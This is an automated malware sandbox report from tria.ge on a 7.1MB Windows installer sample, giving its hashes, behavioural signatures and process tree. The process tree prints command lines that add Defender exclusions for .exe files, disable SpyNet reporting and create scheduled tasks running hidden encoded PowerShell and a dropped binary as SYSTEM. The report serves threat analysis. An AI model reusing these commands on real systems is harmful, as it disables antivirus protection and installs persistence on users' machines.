Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
214s -
max time network
241s -
platform
windows10-1703_x64 -
resource
win10-20231025-en -
resource tags
arch:x64arch:x86image:win10-20231025-enlocale:en-usos:windows10-1703-x64system -
submitted
30/10/2023, 04:49
Static task
static1
Behavioral task
behavioral1
Sample
652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe
Resource
win7-20231020-en
General
-
Target
652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe
-
Size
7.1MB
-
MD5
58657ed42e997c6eee70e649fe8d9892
-
SHA1
56504557e5aa23c907990ce79c2eb1a20a0f272d
-
SHA256
652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c
-
SHA512
fa9c2a5708f18da58e9f87fa4eb612e1ed126623d701a86d1d7fba98c35488dd0f8d4c3e12a57b99104deed89b4d9958cce218de19173a3f8900de9a8c91a114
-
SSDEEP
196608:91OUgP/TcLGwBVpRKQefMiooyXDHGYdxVeHmJkZ8cr:3O3wKwBjsBojGYdcacr
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 34 1164 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Control Panel\International\Geo\Nation VfePcDC.exe -
Executes dropped EXE 4 IoCs
pid Process 5096 Install.exe 4900 Install.exe 4224 pvrsggI.exe 2464 VfePcDC.exe -
Loads dropped DLL 1 IoCs
pid Process 1164 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json VfePcDC.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json VfePcDC.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini VfePcDC.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_B67A81AFAE089B928194572649A22563 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData VfePcDC.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E83F1CC07F729E027C8598AD1DA25FD6 VfePcDC.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol pvrsggI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VfePcDC.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E83F1CC07F729E027C8598AD1DA25FD6 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_B67A81AFAE089B928194572649A22563 VfePcDC.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini pvrsggI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache VfePcDC.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_90E6705D31DA2761A44BA5F5F40B2AEC VfePcDC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_90E6705D31DA2761A44BA5F5F40B2AEC VfePcDC.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi VfePcDC.exe File created C:\Program Files (x86)\cnKtfofVELLNC\CsBrHOG.xml VfePcDC.exe File created C:\Program Files (x86)\cnKtfofVELLNC\iDkRsNo.dll VfePcDC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja VfePcDC.exe File created C:\Program Files (x86)\xaXHhbBRU\zCJKZwA.xml VfePcDC.exe File created C:\Program Files (x86)\MyWyEVaGyEwOczZklbR\PLNuzFw.dll VfePcDC.exe File created C:\Program Files (x86)\MyWyEVaGyEwOczZklbR\lPtaXql.xml VfePcDC.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi VfePcDC.exe File created C:\Program Files (x86)\mBUaPyDkTUtU2\yReoryo.xml VfePcDC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VfePcDC.exe File created C:\Program Files (x86)\mBUaPyDkTUtU2\xDZCibZzPlRhd.dll VfePcDC.exe File created C:\Program Files (x86)\vPdYXglKjKUn\azJSLbX.dll VfePcDC.exe File created C:\Program Files (x86)\xaXHhbBRU\DCbzlh.dll VfePcDC.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VfePcDC.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\byVqvYMHXaoMZDRgRv.job schtasks.exe File created C:\Windows\Tasks\YdWhrynxKGQiTdtBc.job schtasks.exe File created C:\Windows\Tasks\NmaEDVxnjLfXRnq.job schtasks.exe File created C:\Windows\Tasks\fORmCKMRpgzCRPXvW.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4060 schtasks.exe 5072 schtasks.exe 2344 schtasks.exe 4616 schtasks.exe 4956 schtasks.exe 2364 schtasks.exe 2208 schtasks.exe 604 schtasks.exe 4860 schtasks.exe 916 schtasks.exe 2332 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing VfePcDC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix VfePcDC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2" VfePcDC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8555b6b6-0000-0000-0000-d01200000000} VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8555b6b6-0000-0000-0000-d01200000000}\NukeOnDelete = "0" VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8555b6b6-0000-0000-0000-d01200000000}\MaxCapacity = "14116" VfePcDC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ VfePcDC.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 1280 powershell.EXE 1280 powershell.EXE 1280 powershell.EXE 3300 powershell.exe 3300 powershell.exe 3300 powershell.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe 4452 powershell.EXE 4452 powershell.EXE 4452 powershell.EXE 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe 2464 VfePcDC.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1280 powershell.EXE Token: SeDebugPrivilege 3300 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 4452 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3484 wrote to memory of 5096 3484 652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe 70 PID 3484 wrote to memory of 5096 3484 652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe 70 PID 3484 wrote to memory of 5096 3484 652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe 70 PID 5096 wrote to memory of 4900 5096 Install.exe 71 PID 5096 wrote to memory of 4900 5096 Install.exe 71 PID 5096 wrote to memory of 4900 5096 Install.exe 71 PID 4900 wrote to memory of 4204 4900 Install.exe 73 PID 4900 wrote to memory of 4204 4900 Install.exe 73 PID 4900 wrote to memory of 4204 4900 Install.exe 73 PID 4900 wrote to memory of 440 4900 Install.exe 74 PID 4900 wrote to memory of 440 4900 Install.exe 74 PID 4900 wrote to memory of 440 4900 Install.exe 74 PID 4204 wrote to memory of 4252 4204 forfiles.exe 77 PID 4204 wrote to memory of 4252 4204 forfiles.exe 77 PID 440 wrote to memory of 5024 440 forfiles.exe 78 PID 4204 wrote to memory of 4252 4204 forfiles.exe 77 PID 440 wrote to memory of 5024 440 forfiles.exe 78 PID 440 wrote to memory of 5024 440 forfiles.exe 78 PID 4252 wrote to memory of 636 4252 cmd.exe 79 PID 4252 wrote to memory of 636 4252 cmd.exe 79 PID 4252 wrote to memory of 636 4252 cmd.exe 79 PID 5024 wrote to memory of 4460 5024 cmd.exe 80 PID 5024 wrote to memory of 4460 5024 cmd.exe 80 PID 5024 wrote to memory of 4460 5024 cmd.exe 80 PID 5024 wrote to memory of 504 5024 cmd.exe 81 PID 5024 wrote to memory of 504 5024 cmd.exe 81 PID 5024 wrote to memory of 504 5024 cmd.exe 81 PID 4252 wrote to memory of 4628 4252 cmd.exe 82 PID 4252 wrote to memory of 4628 4252 cmd.exe 82 PID 4252 wrote to memory of 4628 4252 cmd.exe 82 PID 4900 wrote to memory of 4616 4900 Install.exe 83 PID 4900 wrote to memory of 4616 4900 Install.exe 83 PID 4900 wrote to memory of 4616 4900 Install.exe 83 PID 4900 wrote to memory of 5016 4900 Install.exe 85 PID 4900 wrote to memory of 5016 4900 Install.exe 85 PID 4900 wrote to memory of 5016 4900 Install.exe 85 PID 1280 wrote to memory of 4624 1280 powershell.EXE 89 PID 1280 wrote to memory of 4624 1280 powershell.EXE 89 PID 4900 wrote to memory of 3680 4900 Install.exe 94 PID 4900 wrote to memory of 3680 4900 Install.exe 94 PID 4900 wrote to memory of 3680 4900 Install.exe 94 PID 4900 wrote to memory of 4860 4900 Install.exe 96 PID 4900 wrote to memory of 4860 4900 Install.exe 96 PID 4900 wrote to memory of 4860 4900 Install.exe 96 PID 4224 wrote to memory of 3300 4224 pvrsggI.exe 99 PID 4224 wrote to memory of 3300 4224 pvrsggI.exe 99 PID 4224 wrote to memory of 3300 4224 pvrsggI.exe 99 PID 3300 wrote to memory of 672 3300 powershell.exe 101 PID 3300 wrote to memory of 672 3300 powershell.exe 101 PID 3300 wrote to memory of 672 3300 powershell.exe 101 PID 672 wrote to memory of 3520 672 cmd.exe 102 PID 672 wrote to memory of 3520 672 cmd.exe 102 PID 672 wrote to memory of 3520 672 cmd.exe 102 PID 3300 wrote to memory of 984 3300 powershell.exe 103 PID 3300 wrote to memory of 984 3300 powershell.exe 103 PID 3300 wrote to memory of 984 3300 powershell.exe 103 PID 3300 wrote to memory of 2452 3300 powershell.exe 104 PID 3300 wrote to memory of 2452 3300 powershell.exe 104 PID 3300 wrote to memory of 2452 3300 powershell.exe 104 PID 3300 wrote to memory of 4184 3300 powershell.exe 105 PID 3300 wrote to memory of 4184 3300 powershell.exe 105 PID 3300 wrote to memory of 4184 3300 powershell.exe 105 PID 3300 wrote to memory of 1472 3300 powershell.exe 106 PID 3300 wrote to memory of 1472 3300 powershell.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe"C:\Users\Admin\AppData\Local\Temp\652fc19098203fda973551173a63e27ec90be970760f0a029f9ae57e453a3d2c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\7zS8FCC.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Users\Admin\AppData\Local\Temp\7zS90E6.tmp\Install.exe.\Install.exe /vNdide "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:636
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4628
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4460
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:504
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcaOFDhEQ" /SC once /ST 03:25:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcaOFDhEQ"4⤵PID:5016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcaOFDhEQ"4⤵PID:3680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byVqvYMHXaoMZDRgRv" /SC once /ST 04:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK\EKwtKDZvYGGovvt\pvrsggI.exe\" SL /ofsite_idcRH 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4860
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4624
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2356
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2344
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4584
-
